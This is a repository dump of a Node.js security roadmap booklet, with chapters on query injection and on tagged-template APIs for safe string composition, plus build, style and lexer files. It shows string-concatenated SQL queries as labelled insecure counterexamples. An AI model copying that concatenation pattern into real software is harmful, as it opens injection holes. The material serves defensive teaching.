17 | 


--------------------------------------------------------------------------------
/chapter-7/query-langs.md:
--------------------------------------------------------------------------------
  1 | # Query injection
  2 | 
  3 | Threats: [QUI][]
  4 | 
  5 | One piece of simple advice to avoid [query injection attacks][QUI] is
  6 | "just use [prepared statements][]."
  7 | 
  8 | This is good advice, and the [`mysql`][] library has a
  9 | solid, well-documented API for producing secure prepared statements.
 10 | 
 11 | Developers could do
 12 | 
 13 | ```js
 14 | const mysql = require('mysql');
 15 | ...
 16 | connection.query(
 17 |     'SELECT * FROM T WHERE x = ?, y = ?, z = ?',
 18 |     [                          x,     y,     z],
 19 |     callback);
 20 | ```
 21 | 
 22 | which is secure since `.query` calls `mysql.format` under the hood
 23 | to escape `x`, `y`, and `z`.  Enough developers still do
 24 | 
 25 | ```js
 26 | connection.query(
 27 |     "SELECT * FROM T WHERE x = '" + x + "', y = '" + y + "', z='" + z + "'",
 28 |     callback);
 29 | ```
 30 | 
 31 | to make query injection a real problem.
 32 | 
 33 | 
 34 | Developers may not know about prepared statements, but prepared
 35 | statements have other problems:
 36 | 
 37 | *  They rely on a **correspondence between positional parameters**
 38 |    and the '`?`'s placeholders that they fill.  When a prepared statement
 39 |    has more substitutions than fit in a reader's working memory, they
 40 |    have to look back and forth between the prepared statement, and the
 41 |    parameter list.
 42 | *  Prepared statements do not make it easy to **compose a query** from
 43 |    simpler query fragments.  It's not easy to compute the `WHERE`
 44 |    clause separately from the result column set and then combine the
 45 |    two into a query without resorting to string concatenation
 46 |    somewhere along the line.
 47 | 
 48 | 
 49 | ## Template literals
 50 | 
 51 | JavaScript has a rarely used feature that lets us get the best of
 52 | both worlds.
 53 | 
 54 | 
 55 | ```js
 56 | connection.query`SELECT * FROM T WHERE x = ${x}, y = ${y}, z = ${z}`(callback)
 57 | ```
 58 | 
 59 | uses a [tagged template literal][] to allow inline expressions in SQL
 60 | syntax.
 61 | 
 62 | > A more advanced form of template literals are tagged template
 63 | > literals. Tags allow you to parse template literals with a
 64 | > function. The first argument of a tag function contains an array of
 65 | > string values. The remaining arguments are related to the
 66 | > expressions. In the end, your function can return your manipulated
 67 | > string (or it can return something completely different ...).
 68 | 
 69 | The code above is almost equivalent to
 70 | 
 71 | ```js
 72 | connection.query(
 73 |     ['SELECT * FROM T WHERE x = ', ', y = ', ', z = ', ''],
 74 |                                   x         y         z
 75 | )(callback);
 76 | ```
 77 | 
 78 | `connection.query` gets called with the parts of the static
 79 | template string specified by the author, followed by the results of
 80 | the expressions.  The final `(callback)` dispatches the query.
 81 | 
 82 | We can tweak SQL APIs so that, when used as template literal tags,
 83 | they escape the dynamic parts to preserve the intent of the author of
 84 | the static parts, and then re-interleave them to produce the query.
 85 | 
 86 | The example ([code][sql-code]) accompanying this chapter implements
 87 | this idea by defining a `mysql.sql` function that parses the static
 88 | parts to choose appropriate escapers for the dynamic parts.
 89 | We have put together a [draft PR][mysql-PR] to integrate this into
 90 | the *mysql* module.
 91 | 
 92 | It also provides string wrappers, `Identifier` and `SqlFragment`, to
 93 | make it easy to compose complex queries from simpler parts:
 94 | 
 95 | ```js
 96 | // Compose a query from two fragments.
 97 | // When the value inside ${...} is a SqlFragment, no extra escaping happens.
 98 | connection.query`
 99 |     SELECT ${outputColumnsAndJoins(a, b, c)}
100 |     WHERE  ${rowFilter(x, y, z)}
101 | `(callback)
102 | 
103 | // Returns a SqlFragment
104 | function rowFilter(x, y, z) {
105 |   if (complexCondition) {
106 |     // mysql.sql returns a SqlFragment
107 |     return mysql.sql`X = ${x}`;
108 |   } else {
109 |     return mysql.sql`Y = ${y} AND Z=${z}`;
110 |   }
111 | }
112 | 
113 | function outputColumnsAndJoins(a, b, c) {
114 |   return mysql.sql`...`;
115 | }
116 | ```
117 | 
118 | ----
119 | 
120 | Our goal was to make the easiest way to express an idea a secure way.
121 | 
122 | As seen below, this template tag API is the shortest way to express
123 | this idea as shown below.  It is also tolerant to small variations
124 | &mdash; the author may leave out quotes since the tag implementation
125 | knows whether a substitution is inside quotes.
126 | 
127 | Shorter & tolerant != easier, but we hope that being shorter, more
128 | robust, more secure, and easy to compose will make it a good migration
129 | target for teams that realize they have a problem with SQL injection.
130 | We also hope these factors will cause developers who have been through
131 | such a migration to continue to use it in subsequent projects where it
132 | may spread to other developers.
133 | 
134 | 
135 | ```js
136 | // Proposed: Secure, tolerant, composes well.
137 | connection.query`SELECT * FROM T WHERE x=${x}`(callback)
138 | connection.query`SELECT * FROM T WHERE x="${x}"`(callback)
139 | 
140 | // String concatenation.  Insecure, composes well.
141 | connection.query('SELECT * FROM T WHERE x = "' + x + '"', callback)
142 | connection.query(`SELECT * FROM T WHERE x = "${x}"`, callback)
143 | 
144 | // String concatenation is not tolerant.
145 | // Broken in a way that will be caught during casual testing.
146 | connection.query('SELECT * FROM T WHERE x = ' + x, callback)
147 | connection.query(`SELECT * FROM T WHERE x = ${x}`, callback)
148 | 
149 | // Prepared Statements.  Secure, composes badly, positional parameters.
150 | connection.query('SELECT * FROM T WHERE x = ?', x, callback)
151 | connection.query('SELECT * FROM T WHERE x = "?"', x, callback)  // Subtly broken
152 | ```
153 | 
154 | 
155 | 
156 | [`mysql`]: https://www.npmjs.com/package/mysql
157 | [QUI]: ../chapter-1/threat-QUI.md
158 | [prepared statements]: https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet#Defense_Option_1:_Prepared_Statements_.28with_Parameterized_Queries.29
159 | [tagged template literal]: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Template_literals#Tagged_template_literals
160 | [sql-code]: https://github.com/google/node-sec-roadmap/tree/master/chapter-7/examples/sql
161 | [mysql-PR]: https://github.com/mysqljs/mysql/pull/1926
162 | 


--------------------------------------------------------------------------------
/chapter-7/structured-strings.md:
--------------------------------------------------------------------------------
  1 | # Structured Strings
  2 | 
  3 | Both of the previously discussed problems, query injection and shell
  4 | injection, are facets of a common problem: it is hard to securely
  5 | compose strings to send outside the process.  In the first case,
  6 | we send a query string to a database via a file descriptor bound to a
  7 | network socket or an IPC endpoint.  In the second, we send a string
  8 | via a syscall wrapper, to spawn a child process.
  9 | 
 10 | ## Success Criteria
 11 | 
 12 | We can securely compose strings for external endpoints if:
 13 | 
 14 | *  Developers routinely use tools to produce structured strings
 15 |    that preserve developers' intent even in the face of inputs
 16 |    crafted by a skilled attacker, and/or
 17 | *  Where developers do not, the backends grant no authority based on
 18 |    the structure of the string, and the authority granted ambiently is
 19 |    so small as to not be abusable.
 20 | 
 21 | Nailing down the definition of *intent* is hard, but here's an example
 22 | of how we can in one context.  Consider
 23 | 
 24 | ```js
 25 | "SELECT * FROM T WHERE id=" + f(accountNumber)
 26 | ```
 27 | 
 28 | A reasonable reader would conclude that the author intended:
 29 | 
 30 | *  That the result specifies one statement, a select statement.
 31 | *  That `f(accountNumber)` specifies only a simple value that
 32 |    can be compared to values in the *id* column.
 33 | 
 34 | Given that, we can say `function f(x)` preserves intent in that code
 35 | if, for any value of `accountNumber`, it throws an exception or
 36 | its output following "`SELECT * FROM T WHERE id=`" parses as a
 37 | single number or string literal token.
 38 | 
 39 | 
 40 | 
 41 | ## A possible solution
 42 | 
 43 | ### Change the world so we can give simple answers to hard questions.
 44 | 
 45 | Extend existing APIs so that whenever a developer is composing a
 46 | string to send outside the `node` process, they have a template
 47 | literal tag based API that is more secure than string concatenation.
 48 | 
 49 | Then, we can give developers a simple piece of advice:
 50 | 
 51 | > If you're composing a string that will end up outside node, use
 52 | > a template tag.
 53 | 
 54 | Template tags will have implementation bugs, but fixing one template
 55 | tag is easier than fixing many expressions of the form
 56 | `("foo " + bar + " baz")`.
 57 | 
 58 | 
 59 | ### A common style guide for tag implementers.
 60 | 
 61 | It would help developers if these template literal tags had some
 62 | consistency across libraries.  We've already briefly discussed ways to
 63 | make template tags more discoverable and usable when talking about
 64 | ways to treat [generated code][synthetic modules] as first class.
 65 | 
 66 | We propose a style guide for tag authors.
 67 | Others will probably have better ideas as to what it should contain, but
 68 | to get a discussion started:
 69 | 
 70 | -  Functions that compose or represent a string whose recipient is outside
 71 |    the node runtime should accept template tags.
 72 |    Examples include `mysql.format` which composes a string of SQL.
 73 | -  These functions should return a typed string wrapper.
 74 |    For example, if the output is a string of *SQL* tokens,
 75 |    then return an instance of:
 76 |    ```js
 77 |    function SqlFragment(s) {
 78 |      if (!(this instanceof SqlFragment)) { return new SqlFragment(s); }
 79 |      this.content = String(s);
 80 |    }
 81 |    SqlFragment.prototype.toString = (() => this.content);
 82 |    ```
 83 |    Don't re-escape `SqlFragment`s received as interpolation values
 84 |    where they make sense.
 85 | -  See if you can reuse string wrappers from a library before rolling
 86 |    your own to encourage interoperability.
 87 |    If a library defines a type representing a fragment of HTML, use that
 88 |    as long as your operator can uphold the type's contract.
 89 |    For example if the type has a particular [security contract][],
 90 |    make sure that you preserve that security contract.
 91 |    You may assume that wrapped strings come from a source that upheld
 92 |    the contract.
 93 |    Producing a value that doesn't uphold its contract when your inputs do
 94 |    is a bug, but assuming incorrectly that type contracts hold for your
 95 |    inputs is not.
 96 |    If you can double check inputs, great!
 97 | -  The canonical way to test whether a function was (very probably)
 98 |    called as a template tag is
 99 |    ```js
100 |    function (a, ...b) {
101 |      if (Array.isArray(a) && Array.isArray(a.raw)
102 |          && Object.isFrozen(a)
103 |          && a.length === b.length + 1) {
104 |        // Treat as template tag.
105 |      }
106 |      // Handle non template tag use.
107 |    }
108 |    ```
109 | -  When a template tag takes options objects, it should
110 |    be possible to curry those before invoking the function as a tag.
111 |    The following passes some environment variables and a working directory
112 |    before the command:
113 |    ```js
114 |    shelljs.exec({ env: ..., cwd: ... })`cat ...`
115 |    ```
116 | -  When a template tag takes a `callback`, the template tag should
117 |    return a function that will receive the callback.
118 |    The following uses a template tag that returns a function that
119 |    takes a callback:
120 |    ```js
121 |    myConnection.query`SELECT ...`(callback)
122 |    ```
123 | -  Where possible, allow indenting multi-line template tags.
124 |    Use the first line with non-whitespace characters as a cue
125 |    when stripping whitespace from the rest of the lines.
126 | 
127 | ## Alternatives
128 | 
129 | Database abstractions like object-relational mappings are a great way
130 | to get developers out of the messy business of composing queries.
131 | 
132 | There are still niche use cases like ad-hoc reporting that require
133 | composing queries, and solving the problem for database queries does
134 | not solve it for strings sent elsewhere, e.g. shells.
135 | 
136 | Builder APIs provide a flexible way to compose structured content.
137 | For example,
138 | 
139 | ```java
140 |   new QueryBuilder()
141 |   .select()
142 |   .innerJoin(...).on(...)
143 |   .columns(...)
144 |   .where(...)
145 |   .orderBy(...)
146 |   .build()
147 | ```
148 | 
149 | The explicit method calls specify the structure of the resulting
150 | string, so controlling parameters doesn't grant control of sentence
151 | structure, and control of one parameter doesn't allow reinterpreting
152 | part of the query specified by an uncontrolled parameter.
153 | 
154 | In JavaScript we prefer tagged templates to builders.  These APIs can
155 | be syntactically heavy and developers have to discover and learn them.
156 | We hope that adoption with template tags will be easier because:
157 | 
158 | *  Tagged templates are syntactically lighter so easier to write.
159 | *  Someone unfamiliar with the API, but familiar with the query language, will
160 |    have to do less work to leverage the one to understand the other making
161 |    tagged templates easier to read and adapt for one's own work.
162 | *  Builder APIs have to treat nested sub-languages (e.g. URLs in HTML)
163 |    as strings unless there is a builder API for the sub-language.
164 | 
165 | 
166 | [security contract]: https://github.com/google/safe-html-types
167 | [synthetic modules]: ../chapter-2/synthetic-modules.html
168 | 


--------------------------------------------------------------------------------
/cover.md:
--------------------------------------------------------------------------------
 1 | # A Roadmap for Node.js Security
 2 | 
 3 | Node.js has a vibrant community of application developers and library
 4 | authors built around a mature and well-maintained core runtime and
 5 | library set.  Its growing popularity is already drawing more attention
 6 | from attackers.  This roadmap discusses how some Node.js projects
 7 | address security challenges, along with ways to make it easier
 8 | for more projects to address these challenges in a thorough and
 9 | consistent manner.
10 | 
11 | This is not the opinion of any organization.  It is the considered
12 | opinion of
13 | [some computer security professionals and Node.js enthusiasts][contributors]
14 | who have worked to make it easier to write secure, robust software on
15 | other platforms; who like a lot about Node.js; and who would like to
16 | help make it better.
17 | 
18 | Our intended audience is Node.js library and infrastructure
19 | maintainers who want to stay ahead of the increased scrutiny that
20 | Node.js is getting from attackers.  We have not researched whether,
21 | and do not assert that, any stack is inherently more or less secure
22 | than any other.
23 | 
24 | Node.js security is especially important for “primary targets”.
25 | Targets are often subdivided into "primary targets" and "targets of
26 | opportunity."  One attacks the latter if one happens to see a
27 | vulnerability.  One goes out of their way to find vulnerabilities in
28 | the former.  The practices which prevent one from becoming a target of
29 | opportunity might not be enough if one is a primary target of an actor
30 | with resources at their disposal.  We hope that the ideas we present
31 | might help primary targets to defeat attacks while making targets of
32 | opportunity rarer and the entire ecosystem more secure.
33 | 
34 | When addressing threats, we want to make sure we preserve Node.js's
35 | strengths.
36 | 
37 | *  Development teams can iterate quickly allowing them to explore a
38 |    large portion of the design space.
39 | *  Developers can use a wealth of publicly available packages to solve
40 |    everyday problems.
41 | *  Anyone who identifies a shared problem can write and publish a
42 |    module to solve it, or send a pull request with a fix or extension
43 |    to an existing project.
44 | *  Node.js integrates with a wide variety of application containers so
45 |    project teams have options when deciding how to deploy.
46 | *  Using JavaScript on the front and back ends of Web applications
47 |    allows developers to work both sides when need be.
48 | 
49 | The individual chapters are largely independent of one another:
50 | 
51 | "[Threat environment][]" discusses the kinds of threats that concern us.
52 | 
53 | "[Dynamism when you need it][]" discusses how to preserve the power of
54 | CommonJS module linking, `vm` contexts, and runtime code generation
55 | while making sure that, in production, only code that the development
56 | team trusts gets run.
57 | 
58 | "[Knowing your dependencies][]" discusses ways to help development
59 | teams make informed decisions about third-party dependencies.
60 | 
61 | "[Keeping your dependencies close][]" discusses how keeping a local
62 | replica of portions of the larger npm repository affects security and
63 | aids incident response.
64 | 
65 | "[Oversight][]" discusses how code-quality tools can help decouple
66 | security review from development.
67 | 
68 | "[When all else fails][]" discusses how the development &rarr;
69 | production pipeline and development practices can affect the ability
70 | of security professionals to identify and respond to imminent threats.
71 | 
72 | "[Library support for safe coding practices][]" discusses idioms
73 | that, if more widespread, might make it easier for developers to
74 | produce secure, robust systems.
75 | 
76 | You can browse the supporting code via *[github.com/google/node-sec-roadmap/][]*.
77 | 
78 | [contributors]: CONTRIBUTORS.md
79 | [Threat environment]: chapter-1/threats.md
80 | [Dynamism when you need it]: chapter-2/dynamism.md
81 | [Knowing your dependencies]: chapter-3/knowing_dependencies.md
82 | [Keeping your dependencies close]: chapter-4/close_dependencies.md
83 | [Oversight]: chapter-5/oversight.md
84 | [When all else fails]: chapter-6/failing.md
85 | [Library support for safe coding practices]: chapter-7/libraries.md
86 | [github.com/google/node-sec-roadmap/]: https://github.com/google/node-sec-roadmap/
87 | 


--------------------------------------------------------------------------------
/images/FileExternal.svg:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <!--
 3 | Per https://commons.wikimedia.org/wiki/File%3AExternal.svg
 4 | By Denelson83 (Own work) [Public domain], via Wikimedia Commons
 5 | -->
 6 | <svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">
 7 | <path fill="#FFF" stroke="#06D" stroke-width="10"
 8 | d="m43,35H5v60h60V57M45,5v10l10,10-30,30 20,20 30-30 10,10h10V5z"/>
 9 | </svg>
10 | 


--------------------------------------------------------------------------------
/images/GitHub-Mark-32px.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/google/node-sec-roadmap/8e01b94ee2a7bbae9c9f758131fd421e2a1c8aa6/images/GitHub-Mark-32px.png


--------------------------------------------------------------------------------
/images/ic_print_24dp.svg:
--------------------------------------------------------------------------------
1 | <svg xmlns="http://www.w3.org/2000/svg" width="24px" height="24px" viewBox="0 0 24 24" fill="#ccc">
2 |     <path d="M19 8H5c-1.66 0-3 1.34-3 3v6h4v4h12v-4h4v-6c0-1.66-1.34-3-3-3zm-3 11H8v-5h8v5zm3-7c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1zm-1-9H6v4h12V3z"/>
3 |     <path d="M0 0h24v24H0z" fill="none"/>
4 | </svg>
5 | 


--------------------------------------------------------------------------------
/images/npmjs-node.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/google/node-sec-roadmap/8e01b94ee2a7bbae9c9f758131fd421e2a1c8aa6/images/npmjs-node.png


--------------------------------------------------------------------------------
/license.md:
--------------------------------------------------------------------------------
1 | <!-- Markdown licensed under CC-BY-4.0
2 |      Supporting code licensed under Apache License 2.0 -->
3 | 
4 | <!-- HTML courtesy https://creativecommons.org/ -->
5 | <a rel="license" href="http://creativecommons.org/licenses/by/4.0/"><img alt="Creative Commons License" style="border-width:0" src="https://i.creativecommons.org/l/by/4.0/88x31.png" /></a><br /><span xmlns:dct="http://purl.org/dc/terms/" href="http://purl.org/dc/dcmitype/Text" property="dct:title" rel="dct:type">A Roadmap for Node.js Security</span> by <a xmlns:cc="http://creativecommons.org/ns#" href="https://github.com/google/node-sec-roadmap/" property="cc:attributionName" rel="cc:attributionURL">https://github.com/google/node-sec-roadmap/</a> is licensed under a <a rel="license" href="http://creativecommons.org/licenses/by/4.0/">Creative Commons Attribution 4.0 International License</a>.
6 | 


--------------------------------------------------------------------------------
/package.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "version": "1.0.0",
 3 |   "name": "@mikesamuel/nodejs_sec_book",
 4 |   "description": "Booklet about NodeJS in organizations with large security profiles",
 5 |   "homepage": "https://github.com/google/node-sec-roadmap/",
 6 |   "license": "(Apache License 2.0 OR CC-BY-4.0)",
 7 |   "author": {
 8 |     "name": "Mike Samuel",
 9 |     "email": "mikesamuel@gmail.com",
10 |     "url": "https://github.com/mikesamuel"
11 |   },
12 |   "files": [
13 |     "www/**"
14 |   ],
15 |   "main": "www/index.html",
16 |   "dependencies": {
17 |     "gitbook": ">=3.2.3",
18 |     "gitbook-cli": ">=2.3.2",
19 |     "gitbook-plugin-ga": "^1.0.1",
20 |     "gitbook-plugin-links": "^3.0.1",
21 |     "svgexport": "^0.3.2"
22 |   },
23 |   "private": true,
24 |   "scripts": {
25 |     "start": "make serve"
26 |   }
27 | }
28 | 


--------------------------------------------------------------------------------
/styles/website.css:
--------------------------------------------------------------------------------
 1 | /**
 2 |  * @license
 3 |  * Copyright 2017 Google LLC
 4 |  *
 5 |  * Licensed under the Apache License, Version 2.0 (the "License");
 6 |  * you may not use this file except in compliance with the License.
 7 |  * You may obtain a copy of the License at
 8 |  *
 9 |  *     https://www.apache.org/licenses/LICENSE-2.0
10 |  *
11 |  * Unless required by applicable law or agreed to in writing, software
12 |  * distributed under the License is distributed on an "AS IS" BASIS,
13 |  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 |  * See the License for the specific language governing permissions and
15 |  * limitations under the License.
16 |  */
17 | 
18 | .print-button.btn.links-link {
19 |     display: inline-block;
20 |     width: 30px;
21 |     font-size: 0;
22 |     background-image: url("/images/ic_print_24dp.svg");
23 |     background-repeat: no-repeat;
24 |     background-position: center center;
25 | }
26 | 
27 | .github-button.btn.links-link {
28 |     display: inline-block;
29 |     width: 30px;
30 |     font-size: 0;
31 |     background-image: url("/images/GitHub-Mark-32px.png");
32 |     background-repeat: no-repeat;
33 |     background-position: center center;
34 |     background-size: 20px;
35 |     opacity: 0.25;
36 | }
37 | 
38 | /* Style external links */
39 | a[href^="http://"]:not([href^="http://www.gitbook.com"]),
40 | a[href^="https://"]:not([href^="https://www.gitbook.com"]),
41 | a[href^="//"]:not([href^="//www.gitbook.com"]) {
42 |     background-image: url("/images/FileExternal.svg");
43 |     background-position: center right;
44 |     background-repeat: no-repeat;
45 |     background-size: 12px 12px;
46 |     padding-right: 14px;
47 | }
48 | 


--------------------------------------------------------------------------------
/third_party/__init__.py:
--------------------------------------------------------------------------------
 1 | # Copyright 2017 Google LLC
 2 | #
 3 | # Licensed under the Apache License, Version 2.0 (the "License");
 4 | # you may not use this file except in compliance with the License.
 5 | # You may obtain a copy of the License at
 6 | #
 7 | #     https://www.apache.org/licenses/LICENSE-2.0
 8 | #
 9 | # Unless required by applicable law or agreed to in writing, software
10 | # distributed under the License is distributed on an "AS IS" BASIS,
11 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | # See the License for the specific language governing permissions and
13 | # limitations under the License.
14 | 


--------------------------------------------------------------------------------
/third_party/jslex/__init__.py:
--------------------------------------------------------------------------------
 1 | # Copyright 2017 Google LLC
 2 | #
 3 | # Licensed under the Apache License, Version 2.0 (the "License");
 4 | # you may not use this file except in compliance with the License.
 5 | # You may obtain a copy of the License at
 6 | #
 7 | #     https://www.apache.org/licenses/LICENSE-2.0
 8 | #
 9 | # Unless required by applicable law or agreed to in writing, software
10 | # distributed under the License is distributed on an "AS IS" BASIS,
11 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | # See the License for the specific language governing permissions and
13 | # limitations under the License.
14 | 


--------------------------------------------------------------------------------
/third_party/jslex/jslex.py:
--------------------------------------------------------------------------------
  1 | # Copyright 2011-2015 Ned Batchelder.  All rights reserved.
  2 | #
  3 | # Except where noted otherwise, this software is licensed under the Apache
  4 | # License, Version 2.0 (the "License"); you may not use this work except in
  5 | # compliance with the License.  You may obtain a copy of the License at
  6 | #
  7 | #     http://www.apache.org/licenses/LICENSE-2.0
  8 | #
  9 | # Unless required by applicable law or agreed to in writing, software
 10 | # distributed under the License is distributed on an "AS IS" BASIS,
 11 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 12 | # See the License for the specific language governing permissions and
 13 | # limitations under the License.
 14 | 
 15 | # From https://bitbucket.org/ned/jslex/raw/a1ee4078977a3ef9c4682837c669637c04c417af/jslex.py
 16 | # For details: https://bitbucket.org/ned/jslex/src/default/NOTICE.txt
 17 | 
 18 | 
 19 | """JsLex: a lexer for Javascript"""
 20 | 
 21 | import re
 22 | 
 23 | class Tok(object):
 24 |     """A specification for a token class."""
 25 | 
 26 |     num = 0
 27 | 
 28 |     def __init__(self, name, regex, next=None):
 29 |         self.id = Tok.num
 30 |         Tok.num += 1
 31 |         self.name = name
 32 |         self.regex = regex
 33 |         self.next = next
 34 | 
 35 | def literals(choices, prefix="", suffix=""):
 36 |     """Create a regex from a space-separated list of literal `choices`.
 37 | 
 38 |     If provided, `prefix` and `suffix` will be attached to each choice
 39 |     individually.
 40 | 
 41 |     """
 42 |     return "|".join(prefix+re.escape(c)+suffix for c in choices.split())
 43 | 
 44 | class Lexer(object):
 45 |     """A generic multi-state regex-based lexer."""
 46 | 
 47 |     def __init__(self, states, first):
 48 |         self.regexes = {}
 49 |         self.toks = {}
 50 | 
 51 |         for state, rules in states.items():
 52 |             parts = []
 53 |             for tok in rules:
 54 |                 groupid = "t%d" % tok.id
 55 |                 self.toks[groupid] = tok
 56 |                 parts.append("(?P<%s>%s)" % (groupid, tok.regex))
 57 |             self.regexes[state] = re.compile("|".join(parts), re.MULTILINE|re.VERBOSE)
 58 | 
 59 |         self.state = first
 60 | 
 61 |     def lex(self, text):
 62 |         """Lexically analyze `text`.
 63 | 
 64 |         Yields pairs (`name`, `tokentext`).
 65 | 
 66 |         """
 67 |         end = len(text)
 68 |         state = self.state
 69 |         regexes = self.regexes
 70 |         toks = self.toks
 71 |         start = 0
 72 | 
 73 |         while start < end:
 74 |             for match in regexes[state].finditer(text, start):
 75 |                 name = match.lastgroup
 76 |                 tok = toks[name]
 77 |                 toktext = match.group(name)
 78 |                 start += len(toktext)
 79 |                 yield (tok.name, toktext)
 80 | 
 81 |                 if tok.next:
 82 |                     state = tok.next
 83 |                     break
 84 | 
 85 |         self.state = state
 86 | 
 87 | 
 88 | class JsLexer(Lexer):
 89 |     """A Javascript lexer
 90 | 
 91 |     >>> lexer = JsLexer()
 92 |     >>> list(lexer.lex("a = 1"))
 93 |     [('id', 'a'), ('ws', ' '), ('punct', '='), ('ws', ' '), ('dnum', '1')]
 94 | 
 95 |     This doesn't properly handle non-Ascii characters in the Javascript source.
 96 | 
 97 |     """
 98 | 
 99 |     # Because these tokens are matched as alternatives in a regex, longer possibilities
100 |     # must appear in the list before shorter ones, for example, '>>' before '>'.
101 |     #
102 |     # Note that we don't have to detect malformed Javascript, only properly lex
103 |     # correct Javascript, so much of this is simplified.
104 | 
105 |     # Details of Javascript lexical structure are taken from
106 |     # http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-262.pdf
107 | 
108 |     # A useful explanation of automatic semicolon insertion is at
109 |     # http://inimino.org/~inimino/blog/javascript_semicolons
110 | 
111 |     both_before = [
112 |         Tok("comment",      r"/\*(.|\n)*?\*/"),
113 |         Tok("linecomment",  r"//.*?$"),
114 |         Tok("ws",           r"\s+"),
115 |         Tok("keyword",      literals("""
116 |                                 break case catch class const continue debugger
117 |                                 default delete do else enum export extends
118 |                                 finally for function if import in instanceof new
119 |                                 return super switch this throw try typeof var
120 |                                 void while with
121 |                                 """, suffix=r"\b"), next='reg'),
122 |         Tok("reserved",     literals("null true false", suffix=r"\b"), next='div'),
123 |         Tok("id",           r"""
124 |                             ([a-zA-Z_$   ]|\\u[0-9a-fA-Z]{4})       # first char
125 |                             ([a-zA-Z_$0-9]|\\u[0-9a-fA-F]{4})*      # rest chars
126 |                             """, next='div'),
127 |         Tok("hnum",         r"0[xX][0-9a-fA-F]+", next='div'),
128 |         Tok("onum",         r"0[0-7]+"),
129 |         Tok("dnum",         r"""
130 |                             (   (0|[1-9][0-9]*)         # DecimalIntegerLiteral
131 |                                 \.                      # dot
132 |                                 [0-9]*                  # DecimalDigits-opt
133 |                                 ([eE][-+]?[0-9]+)?      # ExponentPart-opt
134 |                             |
135 |                                 \.                      # dot
136 |                                 [0-9]+                  # DecimalDigits
137 |                                 ([eE][-+]?[0-9]+)?      # ExponentPart-opt
138 |                             |
139 |                                 (0|[1-9][0-9]*)         # DecimalIntegerLiteral
140 |                                 ([eE][-+]?[0-9]+)?      # ExponentPart-opt
141 |                             )
142 |                             """, next='div'),
143 |         Tok("punct",        literals("""
144 |                                 >>>= === !== >>> <<= >>= <= >= == != << >> && 
145 |                                 || += -= *= %= &= |= ^=
146 |                                 """), next="reg"),
147 |         Tok("punct",        literals("++ -- ) ]"), next='div'),
148 |         Tok("punct",        literals("{ } ( [ . ; , < > + - * % & | ^ ! ~ ? : ="), next='reg'),
149 |         Tok("string",       r'"([^"\\]|(\\(.|\n)))*?"', next='div'),
150 |         Tok("string",       r"'([^'\\]|(\\(.|\n)))*?'", next='div'),
151 |         ]
152 | 
153 |     both_after = [
154 |         Tok("other",        r"."),
155 |         ]
156 | 
157 |     states = {
158 |         'div': # slash will mean division
159 |             both_before + [
160 |             Tok("punct", literals("/= /"), next='reg'),
161 |             ] + both_after,
162 | 
163 |         'reg':  # slash will mean regex
164 |             both_before + [
165 |             Tok("regex",
166 |                 r"""
167 |                     /                       # opening slash
168 |                     # First character is..
169 |                     (   [^*\\/[]            # anything but * \ / or [
170 |                     |   \\.                 # or an escape sequence
171 |                     |   \[                  # or a class, which has
172 |                             (   [^\]\\]     #   anything but \ or ]
173 |                             |   \\.         #   or an escape sequence
174 |                             )*              #   many times
175 |                         \]
176 |                     )
177 |                     # Following characters are same, except for excluding a star
178 |                     (   [^\\/[]             # anything but \ / or [
179 |                     |   \\.                 # or an escape sequence
180 |                     |   \[                  # or a class, which has
181 |                             (   [^\]\\]     #   anything but \ or ]
182 |                             |   \\.         #   or an escape sequence
183 |                             )*              #   many times
184 |                         \]
185 |                     )*                      # many times
186 |                     /                       # closing slash
187 |                     [a-zA-Z0-9]*            # trailing flags
188 |                 """, next='div'),
189 |             ] + both_after,
190 |         }
191 | 
192 |     def __init__(self):
193 |         super(JsLexer, self).__init__(self.states, 'reg')
194 | 
195 | 
196 | def js_to_c_for_gettext(js):
197 |     """Convert the Javascript source `js` into something resembling C for xgettext.
198 | 
199 |     What actually happens is that all the regex literals are replaced with
200 |     "REGEX".
201 | 
202 |     """
203 |     def escape_quotes(m):
204 |         """Used in a regex to properly escape double quotes."""
205 |         s = m.group(0)
206 |         if s == '"':
207 |             return r'\"'
208 |         else:
209 |             return s
210 | 
211 |     lexer = JsLexer()
212 |     c = []
213 |     for name, tok in lexer.lex(js):
214 |         if name == 'regex':
215 |             # C doesn't grok regexes, and they aren't needed for gettext,
216 |             # so just output a string instead.
217 |             tok = '"REGEX"'
218 |         elif name == 'string':
219 |             # C doesn't have single-quoted strings, so make all strings
220 |             # double-quoted.
221 |             if tok.startswith("'"):
222 |                 guts = re.sub(r"\\.|.", escape_quotes, tok[1:-1])
223 |                 tok = '"' + guts + '"'
224 |         elif name == 'id':
225 |             # C can't deal with Unicode escapes in identifiers.  We don't
226 |             # need them for gettext anyway, so replace them with something
227 |             # innocuous
228 |             tok = tok.replace("\\", "U")
229 |         c.append(tok)
230 |     return ''.join(c)
231 | 


--------------------------------------------------------------------------------